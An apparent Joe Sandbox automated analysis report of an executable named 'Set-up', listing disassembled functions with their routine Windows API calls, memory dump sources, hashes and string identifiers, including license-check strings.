                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Hash$ImplImpl::
                                                                                                                                  • String ID: 8$Cleverbridge$Clvrbrg$MSM$Pirated$Unlicensed
                                                                                                                                  • API String ID: 1932635256-2468723722
                                                                                                                                  • Opcode ID: 9ac9669328eb99cf1f01101d28897875e6b16de89e4abadfe102e3735cd0e22a
                                                                                                                                  • Instruction ID: 79a0e13b503266035669d5d81cb5dc9d559d1340881d20a40d7974d77b850c41
                                                                                                                                  • Opcode Fuzzy Hash: 9ac9669328eb99cf1f01101d28897875e6b16de89e4abadfe102e3735cd0e22a
                                                                                                                                  • Instruction Fuzzy Hash: 8B610171C0020AEEDF15EFA4E861BEEBBF8BF11304F108559E16177191DB706A09CBA1
                                                                                                                                  Function 00E63CF0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 136COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8), ref: 00E63D29
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E63E98
                                                                                                                                    • Part of subcall function 00E5EF00: EnterCriticalSection.KERNEL32(0131B8F8), ref: 00E5EF39
                                                                                                                                    • Part of subcall function 00E5EF00: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5EF95
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,01307E00,00000001,?,00000001,?,00000000), ref: 00E63D81
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,01307DF8,00000001,?,00000001,0000003F,00000000), ref: 00E63DBC
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,01307DFC,00000001,?,00000001,0000003F,00000000), ref: 00E63DF8
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,01307DF0,00000001,?,00000001,0000003F,00000000), ref: 00E63E2F
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,01307DF4,00000001,?,00000001,0000003F,00000000), ref: 00E63E6B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$CriticalSection$EnterLeave
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 145704051-1684325040
                                                                                                                                  • Opcode ID: 9e0080bc1adbff3986406274e93409ff2a06224255caccc4ea8abd53fcf1342c
                                                                                                                                  • Instruction ID: 2f267f9418d876aade17e514caf45b4a610f20432c8701980f117e24831a13fc
                                                                                                                                  • Opcode Fuzzy Hash: 9e0080bc1adbff3986406274e93409ff2a06224255caccc4ea8abd53fcf1342c
                                                                                                                                  • Instruction Fuzzy Hash: 1951DD30E84288BEEB22CBA49859BFDBBBCEB01758F400095F594B62C5C3B16B45C761
                                                                                                                                  Function 00E524A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 131COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,?,00000105,?,460C02D8), ref: 00E524FE
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,?,-00000002,?,?,?,460C02D8), ref: 00E52546
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,460C02D8), ref: 00E52552
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E52581
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E525CA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryException@8ThrowWindows$ErrorLast
                                                                                                                                  • String ID: !af_$GetWindowsDirectory()$datavect<wchar_t>::size
                                                                                                                                  • API String ID: 3600687767-570471865
                                                                                                                                  • Opcode ID: e1971f4f327dc1c2de03416313f8cbaccb7d2334f936410a3e83d4d14a9d53d8
                                                                                                                                  • Instruction ID: 3857f6587de53a3e641fca80d023302ef35840ed6fd4f86a5a1a6172278cf3ad
                                                                                                                                  • Opcode Fuzzy Hash: e1971f4f327dc1c2de03416313f8cbaccb7d2334f936410a3e83d4d14a9d53d8
                                                                                                                                  • Instruction Fuzzy Hash: 0D411771A00209EBDB24DBA5CC55FAEBBB8EF15705F00145DE90177280EBB5A908CBA1
                                                                                                                                  Function 00E52070 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 122COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00E520B2
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00000000,00000000,460C02D8,00000000), ref: 00E520C0
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E520EE
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00E52188
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongNamePath$ErrorExceptionException@8LastRaiseThrow
                                                                                                                                  • String ID: GetFullPathName()$GetLongPathName()
                                                                                                                                  • API String ID: 2820348651-3730717445
                                                                                                                                  • Opcode ID: 2ff7ac444e12f53c6ae1aa627e5b5130a40d2e3ecce7cdc3886f20918e2add44
                                                                                                                                  • Instruction ID: 7cafd562220c9eebb3a9b786f2982c3e40a100a37ab46282f66567f52d46c0bc
                                                                                                                                  • Opcode Fuzzy Hash: 2ff7ac444e12f53c6ae1aa627e5b5130a40d2e3ecce7cdc3886f20918e2add44
                                                                                                                                  • Instruction Fuzzy Hash: 10411771600605ABCB24EB65CD45B6FBBFDEF84715F10492DFA15E32C0DBB1A8488791
                                                                                                                                  Function 00E4A9D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116filewindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00E4A99F,0000012B,?,00000000,?,00E4A99F,00000000), ref: 00E4AA06
                                                                                                                                  • OutputDebugStringA.KERNEL32(00E4AACB,?,?,?,?,00000000,?,00E4A99F,00000000), ref: 00E4AA43
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00000000,?,00E4A99F,00000000), ref: 00E4AA4B
                                                                                                                                  • CreateFileA.KERNEL32(CONOUT$,40000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,00000000,?,00E4A99F,00000000), ref: 00E4AA72
                                                                                                                                  • WriteFile.KERNEL32(00000000,00E4AACB,00E4AACC,00E4A99F,00000000,?,?,?,?,00000000,?,00E4A99F,00000000), ref: 00E4AAA2
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,00E4A99F,00000000), ref: 00E4AAB2
                                                                                                                                  • MessageBoxA.USER32(00000000,00E4AACB,00000000), ref: 00E4AAF4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Handle$CloseCreateDebugMessageModuleNameOutputStringWrite
                                                                                                                                  • String ID: CONOUT$
                                                                                                                                  • API String ID: 2479023045-3130406586
                                                                                                                                  • Opcode ID: 0ea9406d79d2125643ab6c692e3fc92cbadd5ddfbf72b3cb28958e201df53699
                                                                                                                                  • Instruction ID: e6f42c317c4fe50823c92b70774f6f2abac3fa4cee8706bf4befbbc4467293bb
                                                                                                                                  • Opcode Fuzzy Hash: 0ea9406d79d2125643ab6c692e3fc92cbadd5ddfbf72b3cb28958e201df53699
                                                                                                                                  • Instruction Fuzzy Hash: F5312C317402146BDB389B34AC85FAE7B68DB95724F044279F916BB2C5CBB06C45C7A2
                                                                                                                                  Function 00E65C40 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(?,?,?), ref: 00E65C61
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E65C6B
                                                                                                                                  • ResetEvent.KERNEL32(?,?,?), ref: 00E65C8B
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E65C95
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65CEE
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65D1B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorEventException@8LastThrow$Reset
                                                                                                                                  • String ID: ResetEvent()$SetEvent()
                                                                                                                                  • API String ID: 840212611-3981826667
                                                                                                                                  • Opcode ID: b30eaa02794d37137588b05c517c383f61b766dcb5d97e16db994851938f3d4a
                                                                                                                                  • Instruction ID: 58781d94fbb5b9a4b5834a6fcb5e425fef5e4ead5c6138a925c55d9ad805b914
                                                                                                                                  • Opcode Fuzzy Hash: b30eaa02794d37137588b05c517c383f61b766dcb5d97e16db994851938f3d4a
                                                                                                                                  • Instruction Fuzzy Hash: B421C731354702AFD618EB34ED49F69BBE4BF54B54F100669B821A32D4DB70B844C796
                                                                                                                                  Function 00E6B0F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObjectEx.KERNEL32(?,00000401,00000000,?,?), ref: 00E6B11A
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E6B128
                                                                                                                                  • WaitForMultipleObjectsEx.KERNEL32(?,?,00000000,00000401,00000000,?,?), ref: 00E6B155
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E6B163
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B1B8
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B1E5
                                                                                                                                  Strings
                                                                                                                                  • WaitForSingleObjectEx(), xrefs: 00E6B196
                                                                                                                                  • WaitForMultipleObjectsEx(), xrefs: 00E6B1BF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8LastThrowWait$MultipleObjectObjectsSingle
                                                                                                                                  • String ID: WaitForMultipleObjectsEx()$WaitForSingleObjectEx()
                                                                                                                                  • API String ID: 391083669-782584538
                                                                                                                                  • Opcode ID: adbc8b5b2db8105f1acfbd0d83c9c9413597668103a2ee8a85ba59a091594394
                                                                                                                                  • Instruction ID: be13d1ce9accc3c9d31c8bb2ad15f870134ff5f1acc583c1a8a700e610b5c174
                                                                                                                                  • Opcode Fuzzy Hash: adbc8b5b2db8105f1acfbd0d83c9c9413597668103a2ee8a85ba59a091594394
                                                                                                                                  • Instruction Fuzzy Hash: A421D470604606BFC714EF24EC55A99BBE4BF49724F100629F435E32D4DB70B954CB95
                                                                                                                                  Function 00E51AE0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,?, $,460C02D8,?), ref: 00E51B12
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E51B49
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E51B78
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E51BD8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw$ErrorLastMultipleObjectsWait
                                                                                                                                  • String ID: $$ $$WaitForMultipleObjects()$WaitForMultipleObjects() returned unexpected result 0x
                                                                                                                                  • API String ID: 1864632994-3414943859
                                                                                                                                  • Opcode ID: 1a2e591c91c95772872f33d6089862eadf5d788da929867d0aa338f88a37dc30
                                                                                                                                  • Instruction ID: bae7fdab55e29ac557b6383fa42e33c283308273345e670d3fa4e31c84906ea9
                                                                                                                                  • Opcode Fuzzy Hash: 1a2e591c91c95772872f33d6089862eadf5d788da929867d0aa338f88a37dc30
                                                                                                                                  • Instruction Fuzzy Hash: 58210531940208AADF24EBA4DC4AFDD7BB9EB01710F1049A9F914B72C1DBB565488796
                                                                                                                                  Function 0111BAD7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • FindCompleteObject.LIBCMT ref: 0111BAF8
                                                                                                                                  • FindSITargetTypeInstance.LIBVCRUNTIME ref: 0111BB1C
                                                                                                                                  • FindMITargetTypeInstance.LIBVCRUNTIME ref: 0111BB31
                                                                                                                                    • Part of subcall function 0111B698: PMDtoOffset.LIBCMT ref: 0111B762
                                                                                                                                  • FindVITargetTypeInstance.LIBVCRUNTIME ref: 0111BB38
                                                                                                                                  • PMDtoOffset.LIBCMT ref: 0111BB49
                                                                                                                                  • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 0111BB73
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0111BB83
